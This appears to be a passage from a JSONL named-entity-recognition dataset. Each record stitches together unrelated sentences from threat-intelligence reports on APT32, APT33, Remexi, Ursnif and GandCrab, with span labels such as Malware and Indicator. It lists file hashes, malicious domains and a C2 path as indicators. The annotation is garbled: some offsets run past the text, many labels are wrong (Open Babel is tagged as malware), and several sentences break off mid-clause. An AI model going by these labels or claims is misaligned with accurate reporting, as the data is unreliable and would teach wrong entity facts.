Talos researchers recently discovered multiple vulnerabilities in Open Babel , an open - source software library used in a variety of chemistry and research settings .", "spans": [{"start": 15, "end": 25, "label": "Malware"}, {"start": 28, "end": 36, "label": "System"}, {"start": 44, "end": 51, "label": "Organization"}, {"start": 66, "end": 71, "label": "Organization"}, {"start": 317, "end": 334, "label": "Organization"}, {"start": 383, "end": 393, "label": "System"}]} {"text": "The short URL redirects to the application page at Google Play . In addition to focused targeting of the private sector with ties to Vietnam , APT32 has also targeted foreign governments , as well as Vietnamese dissidents and journalists since at least 2013 . However , numerous Ursnif variants were hosted on the bevendbrec.com site during this campaign . Now , consider a cyber threat detection system that takes a comprehensive and holistic approach to analyzing user behavior and computing interactions .", "spans": [{"start": 51, "end": 62, "label": "System"}, {"start": 143, "end": 148, "label": "Organization"}, {"start": 175, "end": 186, "label": "Organization"}, {"start": 211, "end": 221, "label": "Organization"}, {"start": 226, "end": 237, "label": "Organization"}, {"start": 279, "end": 285, "label": "Malware"}, {"start": 314, "end": 328, "label": "Indicator"}]} {"text": "The official \u201c Golden Cup \u201d Facebook page . From 2016 through 2017 , two subsidiaries of U.S. and Philippine consumer products corporations , located inside Vietnam , were the target of APT32 intrusion operations . Carbon Black was able to discover approximately 120 different Ursnif variants that were being hosted from the domains iscondisth.com and bevendbrec.com . irongreen.exe : 404d25e3a18bda19a238f77270837198 c064f6f047a4e39014a29c8c95526c3fe90d7bcea5ef0b8f21ea306c27713d1f , Sun Dec 18 11:04:31 2011 UTC . irongreen.text : 85aa9117c381eae3d181ab63daab335e . 
irongreen.rdata : 3e1c774bc4e0ffc2271075e621aa3f3d . irongreen.data : 6c389e5e301564f65dcad4811dbded8b . irongreen.rsrc : efba623cc62ffd0ccbf7f3fbf6264905 . irongreen.reloc : 6cf46599a57a6cbc5d18fbb2883620ce . The fact that this activity occurred as recently as August 2023 suggests that the group is currently active , and that those organizations that may be of interest to Budworm should be aware of this activity and the groups current toolset .", "spans": [{"start": 15, "end": 25, "label": "Malware"}, {"start": 28, "end": 36, "label": "System"}, {"start": 109, "end": 139, "label": "Organization"}, {"start": 186, "end": 191, "label": "Organization"}, {"start": 215, "end": 227, "label": "Organization"}, {"start": 277, "end": 283, "label": "Malware"}, {"start": 333, "end": 347, "label": "Indicator"}, {"start": 352, "end": 366, "label": "Indicator"}, {"start": 369, "end": 382, "label": "Indicator"}, {"start": 385, "end": 417, "label": "Indicator"}, {"start": 418, "end": 482, "label": "Indicator"}, {"start": 516, "end": 530, "label": "Indicator"}, {"start": 533, "end": 565, "label": "Indicator"}, {"start": 568, "end": 583, "label": "Indicator"}, {"start": 586, "end": 618, "label": "Indicator"}, {"start": 621, "end": 635, "label": "Indicator"}, {"start": 638, "end": 670, "label": "Indicator"}, {"start": 673, "end": 687, "label": "Indicator"}, {"start": 690, "end": 722, "label": "Indicator"}, {"start": 725, "end": 740, "label": "Indicator"}, {"start": 743, "end": 775, "label": "Indicator"}, {"start": 856, "end": 859, "label": "Organization"}, {"start": 903, "end": 916, "label": "Organization"}, {"start": 944, "end": 951, "label": "Organization"}, {"start": 993, "end": 999, "label": "Organization"}]} {"text": "The short URL redirects to the application page at Google Play . From 2016 through 2017 , two consumer products corporations , located inside Vietnam , were the target of APT32 intrusion operations . 
While researching this campaign approximately 180 variants were located in the wild . As MuddyWater is assessed to be primarily focused on cyberespionage , it is very likely that data theft is the primary objective behind the Earth Vetala campaign .", "spans": [{"start": 51, "end": 62, "label": "System"}, {"start": 94, "end": 124, "label": "Organization"}, {"start": 171, "end": 176, "label": "Organization"}, {"start": 289, "end": 299, "label": "Organization"}, {"start": 426, "end": 447, "label": "Organization"}]} {"text": "We assume it was rushed because , unlike GlanceLove , it lacked any real obfuscation . In 2014 , APT32 leveraged a spear-phishing attachment titled \" Plans to crackdown on protesters at the Embassy of Vietnam.exe , \" which targeted dissident activity among the Vietnamese diaspora in Southeast Asia . Using the VirusTotal Graph functionality these variants could be organized into several groups that were commonly associated by either metadata or document structures like macros or embedded image files ( depicted in the image below ) . None on the CrowdStrike Falcon \u00ae console and of the market - leading CrowdStrike Falcon \u00ae platform in action .", "spans": [{"start": 41, "end": 51, "label": "Malware"}, {"start": 97, "end": 102, "label": "Organization"}, {"start": 201, "end": 212, "label": "Malware"}, {"start": 272, "end": 280, "label": "Organization"}, {"start": 311, "end": 327, "label": "System"}, {"start": 550, "end": 568, "label": "System"}, {"start": 607, "end": 625, "label": "System"}]} {"text": "Even the C & C server side was mostly exposed with the file listing available for everyone to traverse through it . In 2015 and 2016 , two Vietnamese media outlets were targeted with malware that FireEye assesses to be unique to APT32 . The image below highlights the nodes associated with the samples analyzed in this report . 
The group , which has some loose ties and similarities to other Iranian APTs like APT34 and Charming Kitten , first came to light in 2019 .", "spans": [{"start": 150, "end": 155, "label": "Organization"}, {"start": 196, "end": 203, "label": "Organization"}, {"start": 229, "end": 234, "label": "Organization"}, {"start": 332, "end": 337, "label": "Organization"}, {"start": 392, "end": 404, "label": "Organization"}, {"start": 410, "end": 415, "label": "Organization"}, {"start": 420, "end": 435, "label": "Organization"}]} {"text": "It contained approximately 8GB of stolen data . In 2014 , APT32 leveraged a spear-phishing attachment titled \" Plans to crackdown on protesters at the Embassy of Vietnam.exe \" . The graph can also be viewed in the VTGraph Console for additional exploration . Also , the names he used are not randomized and begin with .", "spans": [{"start": 58, "end": 63, "label": "Organization"}, {"start": 162, "end": 173, "label": "Malware"}, {"start": 214, "end": 229, "label": "System"}, {"start": 266, "end": 317, "label": "Malware"}]} {"text": "A recent whois of \u201c goldncup.com \u201d . Since at least 2014 , FireEye has observed APT32 targeting foreign corporations with a vested interest in Vietnam 's manufacturing , consumer products , and hospitality sectors . The graph highlights the at least 3 different variants of Ursnif that were being hosted on the bevendbrec.com site . 
The fact the attackers were attempting to connect in realtime with victims over phones and video conferences for conversations rather than just engaging over email is also unusual , suggesting confidence in the attackers skills in English and in impersonation although it is not clear if any conversations ended up taking place .", "spans": [{"start": 20, "end": 32, "label": "Indicator"}, {"start": 59, "end": 66, "label": "Organization"}, {"start": 80, "end": 85, "label": "Organization"}, {"start": 96, "end": 116, "label": "Organization"}, {"start": 154, "end": 167, "label": "Organization"}, {"start": 170, "end": 187, "label": "Organization"}, {"start": 194, "end": 213, "label": "Organization"}, {"start": 274, "end": 280, "label": "Malware"}, {"start": 311, "end": 325, "label": "Indicator"}, {"start": 346, "end": 355, "label": "Organization"}]} {"text": "Creation date is a week before the start of the tournament . APT32 operations are characterized through deployment of signature malware payloads including WINDSHIELD , KOMPROGO , SOUNDBITE , and PHOREAL . The Ursnif variants were primarily grouped by C2 infrastructure . Companies conducing a risk analysis would be well served to consider such motivations when evaluating their exposure .", "spans": [{"start": 61, "end": 66, "label": "Organization"}, {"start": 155, "end": 165, "label": "System"}, {"start": 168, "end": 176, "label": "System"}, {"start": 179, "end": 188, "label": "System"}, {"start": 195, "end": 202, "label": "System"}, {"start": 209, "end": 215, "label": "Malware"}, {"start": 251, "end": 253, "label": "System"}]} {"text": "A recent whois of \u201c goldncup.com \u201d . In 2017 , social engineering content in lures used by the actor provided evidence that they were likely used to target members of the Vietnam diaspora in Australia as well as government employees in the Philippines . The large grouping on the right of the diagram are direct variants of the sample referenced in this write up . 
One interesting detail about Hack520 is his apparent love for pigs , as seen in his use of the word in his email addresses .", "spans": [{"start": 20, "end": 32, "label": "Indicator"}, {"start": 47, "end": 65, "label": "Organization"}, {"start": 95, "end": 100, "label": "Organization"}, {"start": 179, "end": 187, "label": "Organization"}, {"start": 212, "end": 232, "label": "Organization"}, {"start": 394, "end": 401, "label": "Organization"}]} {"text": "Creation date is a week before the start of the tournament . APT32 often deploys these backdoors along with the commercially-available Cobalt Strike BEACON backdoor . Samples in this grouping were all hosted on sites that were called by the second stage . We can compare many successful RDP attacks to the equivalent of leaving a window or back door unlocked at our homes , giving the criminal a low barrier to entry .", "spans": [{"start": 61, "end": 66, "label": "Organization"}, {"start": 135, "end": 164, "label": "System"}, {"start": 374, "end": 416, "label": "Vulnerability"}]} {"text": "How it Works In order to get into the Google Play Store , the malware uses a phased approach which is quite a common practice for malware authors these days . APT32 often deploys these backdoors along with the commercially-available Cobalt Strike backdoor . The samples had minor changes , and were presumably changed by the attackers to avoid detection by hash . Threat actors like the Winnti group rarely ever stay static in terms of both tools and tactics .", "spans": [{"start": 38, "end": 49, "label": "System"}, {"start": 159, "end": 164, "label": "Organization"}, {"start": 233, "end": 255, "label": "System"}, {"start": 364, "end": 377, "label": "Organization"}, {"start": 387, "end": 399, "label": "Organization"}]} {"text": "The original app looks innocent , with most of its code aimed at implementing the real features that the app claims to provide . 
Based on incident response investigations , product detections , and intelligence observations along with additional publications on the same operators , FireEye assesses that APT32 is a cyber espionage group aligned with Vietnamese government interests . Word Dropper Variant cc5a14ff026ee593d7d25f213715b73833e6b9cf71091317121a009d5ad7fc36 7ce3d9fc86396fac9865607594395e94 Word Dropper Variant 28a8d6b8a0cdcb25d098e403cc8b6dcb855cb591f0b54c2e3363b5c580d92b28 74c7aed44680100e984251ce2cdbdbc6 Word Dropper Variant facbc2cb089668197ca3968a3433b6f4826430c13f7d1c75b44667307c67dfe3 10f308d78adda567d4589803ce18cc9b Word Dropper Variant e714a5147335245c386b105bb7494a8b190b6a737ba28f029561efe48105cd11 f279d0f04874327b85221697d99de321 Word Dropper Variant 56c46ef3d5bd544fa35f6e336d3be93cf36e72d0273fa1dbc915979f2d883e9d bc1b322e7efc19417ab0d0524ccb9ff2 . Mandiant has observed overlap amongst multiple North Korean groups that fall under the RGB .", "spans": [{"start": 271, "end": 280, "label": "Organization"}, {"start": 283, "end": 290, "label": "Organization"}, {"start": 305, "end": 310, "label": "Organization"}, {"start": 316, "end": 337, "label": "Organization"}, {"start": 385, "end": 397, "label": "Malware"}, {"start": 406, "end": 470, "label": "Indicator"}, {"start": 471, "end": 503, "label": "Indicator"}, {"start": 504, "end": 516, "label": "Malware"}, {"start": 525, "end": 589, "label": "Indicator"}, {"start": 590, "end": 622, "label": "Indicator"}, {"start": 623, "end": 635, "label": "Malware"}, {"start": 644, "end": 708, "label": "Indicator"}, {"start": 709, "end": 741, "label": "Indicator"}, {"start": 742, "end": 754, "label": "Malware"}, {"start": 763, "end": 827, "label": "Indicator"}, {"start": 828, "end": 860, "label": "Indicator"}, {"start": 861, "end": 873, "label": "Malware"}, {"start": 882, "end": 946, "label": "Indicator"}, {"start": 947, "end": 979, "label": "Indicator"}, {"start": 1004, "end": 1074, "label": "Indicator"}]} {"text": "In addition , it collects 
identifiers and some data from the device . OceanLotus , also known as APT32 , is believed to be a Vietnam-based APT group that has become increasingly sophisticated in its attack tactics , techniques , and procedures ( TTPs ) . Ursnif Variant 446ffd272c79554a19b5f4299327fb74b8ff457681d10571caa6eea51ec406b0 ea7e1650031c92b7377788f05926034e Ursnif Variant 42636f3185c9e398958aad272d983c8b8b1409df4ce93f1f8f608e190290f56d 377cd85d8d68fc58976a123aa151c5e0 Ursnif Variant 24b2141c1134ef14f33a38c58342b6573940c5460d03a2945fafac36e32e6889 b73cbffea8094cfa18b067d9568c53e7 Ursnif Variant e53b0a60c238c45019089bdf7f16d5f47b7ba15ca2c918e385c41f0c2076eb52 24fe5a6196e32749cd030ab51824cabe Ursnif Variant 4c8de1713f830819e8354b653fd19a5cafd0bc8fa3145eedf555f24261c874de 589734cb60aa515599c687539c520049 . Cisco Talos recently worked with two vendors to patch multiple vulnerabilities in a favored software library used in chemistry laboratories and the Foxit PDF Reader , one of the most popular PDF reader alternatives to Adobe Acrobat .", "spans": [{"start": 70, "end": 80, "label": "Organization"}, {"start": 97, "end": 102, "label": "Organization"}, {"start": 139, "end": 148, "label": "Organization"}, {"start": 255, "end": 261, "label": "Malware"}, {"start": 270, "end": 334, "label": "Indicator"}, {"start": 335, "end": 367, "label": "Indicator"}, {"start": 368, "end": 374, "label": "Malware"}, {"start": 383, "end": 447, "label": "Indicator"}, {"start": 448, "end": 480, "label": "Indicator"}, {"start": 481, "end": 487, "label": "Malware"}, {"start": 496, "end": 560, "label": "Indicator"}, {"start": 561, "end": 593, "label": "Indicator"}, {"start": 594, "end": 600, "label": "Malware"}, {"start": 609, "end": 673, "label": "Indicator"}, {"start": 674, "end": 706, "label": "Indicator"}, {"start": 707, "end": 713, "label": "Malware"}, {"start": 722, "end": 786, "label": "Indicator"}, {"start": 787, "end": 819, "label": "Indicator"}, {"start": 822, "end": 833, "label": "Organization"}, 
{"start": 970, "end": 986, "label": "System"}, {"start": 1040, "end": 1053, "label": "System"}]} {"text": "After getting a command from the C & C , the app is able to download a malicious payload in the form of a .dex file that is being dynamically loaded adding the additional malicious capabilities . While Volexity does not typically engage in attempting attribution of any threat actor , Volexity does agree with previously reported assessments that OceanLotus is likely operating out of Vietnam . GandCrab Variant d6c53d9341dda1252ada3861898840be4d669abae2b983ab9bf5259b84de7525 ce1ee671fe5246a9c40b624ef97e4de1 GandCrab Variant aca0b96126c813b0d29d6fbff9175f8ca62ff2ec6eed83bff76a73ae717cfcb8 07f955796a252771861c8e0db06b1f01 GandCrab Variant 8cd45f8c8f2ed0109db6a64f9945f3dcb8a780f65c76aedded7b8af95e6dc7ec 4fcd0d13ea669a83a749ae5bfb098ca2 GandCrab Variant 933210a9d19b25e0711ae88eece1ba06bb035a01ab2880cc707ff55bdd3b8dd0 8ec87fd3ea777fa8d5160dc957e6683e GandCrab Variant e564e87958b3e76bc9bfeb5bed773b7a17f3a82f84872acdbb609aa43a9cd776 c7d5077960882259b85c01fd41c49ffd . 
Then it calls with invalid value 69 .", "spans": [{"start": 202, "end": 210, "label": "Organization"}, {"start": 270, "end": 282, "label": "Organization"}, {"start": 285, "end": 293, "label": "Organization"}, {"start": 347, "end": 357, "label": "Organization"}, {"start": 395, "end": 403, "label": "Malware"}, {"start": 412, "end": 476, "label": "Indicator"}, {"start": 477, "end": 509, "label": "Indicator"}, {"start": 510, "end": 518, "label": "Malware"}, {"start": 527, "end": 591, "label": "Indicator"}, {"start": 592, "end": 624, "label": "Indicator"}, {"start": 625, "end": 633, "label": "Malware"}, {"start": 642, "end": 706, "label": "Indicator"}, {"start": 707, "end": 739, "label": "Indicator"}, {"start": 740, "end": 748, "label": "Malware"}, {"start": 757, "end": 821, "label": "Indicator"}, {"start": 822, "end": 854, "label": "Indicator"}, {"start": 855, "end": 863, "label": "Malware"}, {"start": 872, "end": 936, "label": "Indicator"}, {"start": 937, "end": 969, "label": "Indicator"}]} {"text": "In this way , the malware authors can submit their app and add the malicious capabilities only after their app is live on the Play Store . During that phase , the APT32 operated a fileless PowerShell-based infrastructure , using customized PowerShell payloads taken from known offensive frameworks such as Cobalt Strike , PowerSploit and Nishang . Chafer used Remexi malware to spy on Iran-based foreign diplomatic entities Throughout the autumn of 2018 we analyzed a long-standing (and still active at that time) cyber-espionage campaign that was primarily targeting foreign diplomatic entities based in Iran . STRATOFEAR ( com.google.kservice , us.zoom . 
ZoomService )", "spans": [{"start": 126, "end": 136, "label": "System"}, {"start": 163, "end": 168, "label": "Organization"}, {"start": 229, "end": 250, "label": "System"}, {"start": 306, "end": 319, "label": "System"}, {"start": 322, "end": 333, "label": "System"}, {"start": 338, "end": 345, "label": "System"}, {"start": 348, "end": 354, "label": "Organization"}, {"start": 360, "end": 366, "label": "Malware"}, {"start": 612, "end": 622, "label": "Malware"}]} {"text": "Communication with the C & C In order to communicate with its C & C , the app uses the MQTT ( Message Queuing Telemetry Transport ) protocol , which is transported over TCP port 1883 . However , over the past few years , we have been tracking a separate , less widely known suspected Iranian group with potential destructive capabilities , whom we call APT33 . The attackers were using an improved version of Remexi in what the victimology suggests might be a domestic cyber-espionage . Once the malware is dropped and executed through the lure documents , the Foudre backdoor connects to the HTTP commandandcontrol C2 server and downloads a selfextracting archive with fullfeatured Tonnerre malware .", "spans": [{"start": 169, "end": 182, "label": "Indicator"}, {"start": 292, "end": 297, "label": "Organization"}, {"start": 353, "end": 358, "label": "Organization"}, {"start": 409, "end": 415, "label": "Malware"}, {"start": 496, "end": 503, "label": "Malware"}, {"start": 561, "end": 576, "label": "Malware"}, {"start": 589, "end": 625, "label": "System"}, {"start": 670, "end": 699, "label": "Malware"}]} {"text": "Initiating the MQTT client . Our analysis reveals that APT33 is a capable group that has carried out cyber espionage operations since at least 2013 . This malware has previously been associated with an APT actor that Symantec calls Chafer . 
In todays world of evolving malware , there are likely a lot of threats antivirus does nt know about .", "spans": [{"start": 55, "end": 60, "label": "Organization"}, {"start": 74, "end": 79, "label": "Organization"}, {"start": 217, "end": 225, "label": "Organization"}, {"start": 232, "end": 238, "label": "Organization"}, {"start": 269, "end": 276, "label": "Malware"}, {"start": 313, "end": 322, "label": "Organization"}]} {"text": "Initiating the MQTT client . We assess APT33 works at the behest of the Iranian government . The malware can exfiltrate keystrokes, screenshots, browser-related data like cookies and history, decrypted when . One of the problems with relying entirely on one security solution is that the cyber threat landscape changes rapidly .", "spans": [{"start": 39, "end": 44, "label": "Organization"}]} {"text": "Initiating the MQTT client . APT33 has targeted organizations \u2013 spanning multiple industries \u2013 headquartered in the United States , Saudi Arabia and South Korea . The attackers rely heavily on Microsoft technologies on both the client and server sides: the Trojan uses standard Windows utilities like Microsoft Background Intelligent Transfer Service (BITS ) bitsadmin.exe to receive commands and exfiltrate . 
Germany retained its place as the fourth most attacked country in the world , and the most attacked country outside of the anglosphere .", "spans": [{"start": 29, "end": 34, "label": "Organization"}, {"start": 64, "end": 92, "label": "Organization"}, {"start": 193, "end": 202, "label": "Organization"}, {"start": 257, "end": 263, "label": "System"}, {"start": 278, "end": 285, "label": "System"}, {"start": 301, "end": 350, "label": "System"}, {"start": 351, "end": 356, "label": "System"}, {"start": 359, "end": 372, "label": "Indicator"}, {"start": 440, "end": 487, "label": "Indicator"}, {"start": 496, "end": 544, "label": "Indicator"}]} {"text": "The app connects to the MQTT broker with hardcoded username and password and a unique device identifier generated for each device . Cybereason also attributes the recently reported Backdoor.Win32.Denis to the OceanLotus Group , which at the time of this report 's writing , had not been officially linked to this threat actor . Its C2 is based on IIS using .asp technology to handle the victims\u2019 HTTP . This \u201c est \u201d reference could refer to a hacking group with its own message board on which hack520 also posts regularly .", "spans": [{"start": 132, "end": 142, "label": "Organization"}, {"start": 181, "end": 201, "label": "System"}, {"start": 209, "end": 225, "label": "Organization"}, {"start": 313, "end": 325, "label": "Organization"}, {"start": 332, "end": 334, "label": "System"}, {"start": 347, "end": 350, "label": "System"}, {"start": 357, "end": 361, "label": "Indicator"}, {"start": 493, "end": 500, "label": "Organization"}]} {"text": "The MQTT connection to broker The MQTT connection to broker The MQTT communication is used primarily to update the device state and get commands from the C & C . APT33 has shown particular interest in organizations in the aviation sector , as well as organizations in the energy sector with ties to petrochemical production . 
Remexi developers use the C programming language and GCC compiler on Windows in the MinGW . Cisco Duo provides multi - factor authentication for users to ensure only those authorized are accessing your network .", "spans": [{"start": 162, "end": 167, "label": "Organization"}, {"start": 222, "end": 237, "label": "Organization"}, {"start": 272, "end": 285, "label": "Organization"}, {"start": 299, "end": 312, "label": "Organization"}, {"start": 326, "end": 332, "label": "Malware"}, {"start": 352, "end": 353, "label": "System"}, {"start": 379, "end": 382, "label": "System"}, {"start": 395, "end": 402, "label": "System"}, {"start": 410, "end": 415, "label": "System"}, {"start": 418, "end": 427, "label": "System"}]} {"text": "It uses different topics that include the unique device identifier , which side is sending the message , and whether it is information message or command . From mid-2016 through early 2017 , APT33 compromised a U.S. organization in the aerospace sector and targeted a business conglomerate located in Saudi Arabia with aviation holdings . They most likely used the Qt Creator IDE in a Windows . The email address admin@93[.]gd is linked to IP addresses owned by a certain user with the nickname \u201c PIG GOD\u201d\u2014another", "spans": [{"start": 191, "end": 196, "label": "Organization"}, {"start": 216, "end": 228, "label": "Organization"}, {"start": 236, "end": 252, "label": "Organization"}, {"start": 268, "end": 289, "label": "Organization"}, {"start": 365, "end": 379, "label": "System"}, {"start": 385, "end": 392, "label": "System"}, {"start": 395, "end": 513, "label": "Indicator"}]} {"text": "HTTP Communication In addition to the MQTT communication , the app also uses plain text HTTP communication in order to download the .dex file and upload collected data . From mid-2016 through early 2017 , APT33 compromised organizations located in Saudi Arabia and U.S. in the aerospace sector . 
The malware utilizes several persistence mechanisms including scheduled tasks, Userinit and Run registry keys in the HKLM . Composition of the KillNet Collective", "spans": [{"start": 205, "end": 210, "label": "Organization"}, {"start": 277, "end": 293, "label": "Organization"}, {"start": 413, "end": 417, "label": "System"}, {"start": 439, "end": 457, "label": "Organization"}]} {"text": "All of the files that are being uploaded or downloaded are zip files encrypted by AES with ECB mode . During the same time period , APT33 also targeted companies in South Korea involved in oil refining and petrochemicals . XOR and RC4 encryption is used with quite long unique keys for different . By creating awareness and using the right solutions , both individuals and organizations can take the steps needed to defend against the malicious tactics used by threat actors like the Winnti group .", "spans": [{"start": 132, "end": 137, "label": "Organization"}, {"start": 189, "end": 201, "label": "Organization"}, {"start": 206, "end": 220, "label": "Organization"}, {"start": 484, "end": 496, "label": "Organization"}]} {"text": "The key for each file is generated randomly and stored in the encrypted file with a fixed offset . More recently , in May 2017 , APT33 appeared to target a Saudi organization and a South Korean business conglomerate using a malicious file that attempted to entice victims with job vacancies for a Saudi Arabian petrochemical company . Among all these random keys once the word \u201csalamati\u201d was also used, which means \u201chealth\u201d in Farsi . 
It appears the activity by the group may have been stopped early in the attack chain as the only malicious activity seen on infected machines is credential harvesting .", "spans": [{"start": 129, "end": 134, "label": "Organization"}, {"start": 162, "end": 174, "label": "Organization"}, {"start": 194, "end": 215, "label": "Organization"}, {"start": 224, "end": 238, "label": "Malware"}, {"start": 311, "end": 332, "label": "Organization"}, {"start": 466, "end": 471, "label": "Organization"}, {"start": 559, "end": 576, "label": "System"}]} {"text": "In order to upload the file , the app uses a basic REST communication with the server , checking if the file exists and uploading it if it isn \u2019 t . More recently , in May 2017 , APT33 appeared to target organizations in Saudi and South Korea using a malicious file that attempted to entice victims with job vacancies . Kaspersky Lab products detect the malware described in this report as Trojan.Win32.Remexi and Trojan.Win32.Agent . The chain of evidence suggests that the threat actor \u2019s motives are financially driven .", "spans": [{"start": 179, "end": 184, "label": "Organization"}, {"start": 251, "end": 265, "label": "Malware"}, {"start": 320, "end": 333, "label": "Organization"}, {"start": 390, "end": 409, "label": "Indicator"}, {"start": 414, "end": 432, "label": "Indicator"}]} {"text": "The path that is used for the uploads is : http : // /apps/d/p/op.php The communication looks like this : First Phase The first phase of the app \u2019 s attack flow collects device information and a list of apps installed on the device . We assess the targeting of multiple companies with aviation-related partnerships to Saudi Arabia indicates that APT33 may possibly be looking to gain insights on Saudi Arabia 's military aviation capabilities to enhance Iran 's domestic aviation capabilities or to support Iran 's military and strategic decision making vis a vis Saudi Arabia . 
This blogpost is based in our original report shared with our APT Intelligence Reporting customers last November 2018 . That 's because a new ransomware called BlackSuit had appeared which shared 98 percent of its code with the infamous Royal ransomware .", "spans": [{"start": 43, "end": 69, "label": "Indicator"}, {"start": 346, "end": 351, "label": "Organization"}, {"start": 515, "end": 523, "label": "Organization"}, {"start": 739, "end": 748, "label": "Malware"}, {"start": 816, "end": 832, "label": "Malware"}]} {"text": "These are then uploaded to the C & C HTTP server . APT33 may possibly be looking to gain insights on Saudi Arabia 's military aviation capabilities to enhance Iran 's domestic aviation capabilities or to support Iran 's military and strategic decision making vis a vis Saudi Arabia . The main tool used in this campaign is an updated version of the Remexi malware, publicly reported by Symantec back in 2015 . They work to bypass traditional security barriers on the Android operating system and provide a variety of information stealing , surveillance and remote access capabilities .", "spans": [{"start": 51, "end": 56, "label": "Organization"}, {"start": 220, "end": 228, "label": "Organization"}, {"start": 349, "end": 355, "label": "Malware"}, {"start": 386, "end": 394, "label": "Organization"}, {"start": 467, "end": 491, "label": "System"}]} {"text": "The collection of basic device information . The generalized targeting of organizations involved in energy and petrochemicals mirrors previously observed targeting by other suspected Iranian threat groups , indicating a common interest in the sectors across Iranian actors . The newest module\u2019s compilation timestamp is March 2018 . 
Budworm aka LuckyMouse , Emissary Panda , APT27 deployed a previously unseen variant of its SysUpdate backdoor SysUpdate DLL inicore_v2.3.30.dll .", "spans": [{"start": 100, "end": 106, "label": "Organization"}, {"start": 111, "end": 125, "label": "Organization"}, {"start": 191, "end": 204, "label": "Organization"}, {"start": 266, "end": 272, "label": "Organization"}, {"start": 333, "end": 340, "label": "Organization"}, {"start": 345, "end": 355, "label": "Organization"}, {"start": 358, "end": 372, "label": "Organization"}, {"start": 373, "end": 374, "label": "Organization"}, {"start": 425, "end": 477, "label": "Malware"}]} {"text": "The collection of basic device information . APT33 sent spear phishing emails to employees whose jobs related to the aviation industry . The developers used GCC compiler on Windows in the MinGW . Commercial spyware can be seen as having legitimate reasons to exist , especially in instances of crime and terrorism ( as long as it is highly regulated ) .", "spans": [{"start": 45, "end": 50, "label": "Organization"}, {"start": 81, "end": 90, "label": "Organization"}, {"start": 117, "end": 134, "label": "Organization"}, {"start": 157, "end": 160, "label": "System"}, {"start": 173, "end": 180, "label": "System"}, {"start": 188, "end": 193, "label": "System"}, {"start": 196, "end": 214, "label": "System"}]} {"text": "In addition , at this stage the app can process one of these commands : \u2022 Collect device info \u2022 Install app \u2022 Is online ? APT33 registered multiple domains that masquerade as Saudi Arabian aviation companies and Western organizations that together have partnerships to provide training , maintenance and support for Saudi 's military and commercial fleet . Inside the binaries the compiler left references to the names of the C source file modules used: operation_reg.c , thread_command.c and thread_upload.c . 
What makes COSMICENERGY unique is that based on our analysis , a contractor may have developed it as a red teaming tool for simulated power disruption exercises hosted by Rostelecom - Solar , a Russian cyber security company .", "spans": [{"start": 122, "end": 127, "label": "Organization"}, {"start": 189, "end": 207, "label": "Organization"}, {"start": 426, "end": 427, "label": "System"}, {"start": 454, "end": 469, "label": "Indicator"}, {"start": 472, "end": 488, "label": "Indicator"}, {"start": 493, "end": 508, "label": "Indicator"}, {"start": 522, "end": 534, "label": "Malware"}, {"start": 574, "end": 671, "label": "Malware"}, {"start": 682, "end": 700, "label": "Organization"}, {"start": 705, "end": 735, "label": "Organization"}]} {"text": "\u2022 Change server domain Out of these , the most interesting command is the \u201c install app \u201d command that downloads an encrypted zip file containing the second phase dex file , unpacks and loads it . We identified APT33 malware tied to an Iranian persona who may have been employed by the Iranian government to conduct cyber threat activity against its adversaries . Like mentioned in modules file names the malware consists of several working threads dedicated to different tasks, including C2 command parsing and data . 
Among the IP addresses owned by Hack520 is a whole/22 IP Range which we dubbed as the \u201c PIG RANGE \u201d .", "spans": [{"start": 211, "end": 224, "label": "System"}, {"start": 489, "end": 491, "label": "System"}, {"start": 551, "end": 558, "label": "Organization"}, {"start": 564, "end": 616, "label": "Indicator"}]} {"text": "Second Phase The second phase dex file contains 3 main services that are being used : \u2022 ConnManager - handles connections to the C & C \u2022 ReceiverManager - waits for incoming calls / app installations \u2022 TaskManager - manages the data collection tasks The C & C server address is different than the one that is used by the first phase , so the app reconnects to the new server as well as starts the periodic data collector tasks . APT33 's targeting of organizations involved in aerospace and energy most closely aligns with nation-state interests , implying that the threat actor is most likely government sponsored . For both the receiving of C2 commands and exfiltration, Remexi uses the Microsoft Background Intelligent Transfer Service (BITS ) mechanism to communicate with the C2 over . 
Notably , the main function contains logic flaws that cause it to only be able to connect to an MSSQL server and upload ( LIGHTWORK ) to it , before immediately attempting to clean itself up .", "spans": [{"start": 429, "end": 434, "label": "Organization"}, {"start": 477, "end": 486, "label": "Organization"}, {"start": 491, "end": 497, "label": "Organization"}, {"start": 566, "end": 578, "label": "Organization"}, {"start": 643, "end": 645, "label": "System"}, {"start": 673, "end": 679, "label": "Malware"}, {"start": 689, "end": 738, "label": "System"}, {"start": 739, "end": 744, "label": "System"}, {"start": 781, "end": 783, "label": "System"}, {"start": 801, "end": 983, "label": "Malware"}]} {"text": "By analyzing the TaskManager class we can see the new commands that are supported at this stage : As can be seen in the code snippet above , there are quite a lot of data collection tasks that are now available : Collect device info Track location Upload contacts information Upload sent and received SMS messages Upload images Upload video files Send recursive dirlist of the external storage Upload specific files Record audio using the microphone Record calls Use the camera to capture bursts of snapshots Those tasks can either run periodically , on event ( such as incoming call ) or when getting APT33 leverages popular Iranian hacker tools and DNS servers used by other suspected Iranian threat groups . So far, our telemetry hasn\u2019t provided any concrete evidence that shows us how the Remexi malware . 
The result is that Vice Society is the most prolific attacker of education institutions in the two most attacked countries in the world : the USA and the UK .", "spans": [{"start": 602, "end": 607, "label": "Organization"}, {"start": 695, "end": 708, "label": "Organization"}, {"start": 793, "end": 799, "label": "Malware"}, {"start": 829, "end": 841, "label": "Organization"}, {"start": 875, "end": 897, "label": "Organization"}, {"start": 952, "end": 955, "label": "Organization"}, {"start": 964, "end": 966, "label": "Organization"}]} {"text": "a command from the C & C server . This coupled with the timing of operations \u2013 which coincides with Iranian working hours \u2013 and the use of multiple Iranian hacker tools and name servers bolsters our assessment that APT33 may have operated on behalf of the Iranian government . However, we think it\u2019s worth mentioning that for one victim we found a correlation between the execution of Remexi\u00b4s main module and the execution of an AutoIt script compiled as PE , which we believe may have dropped the . 
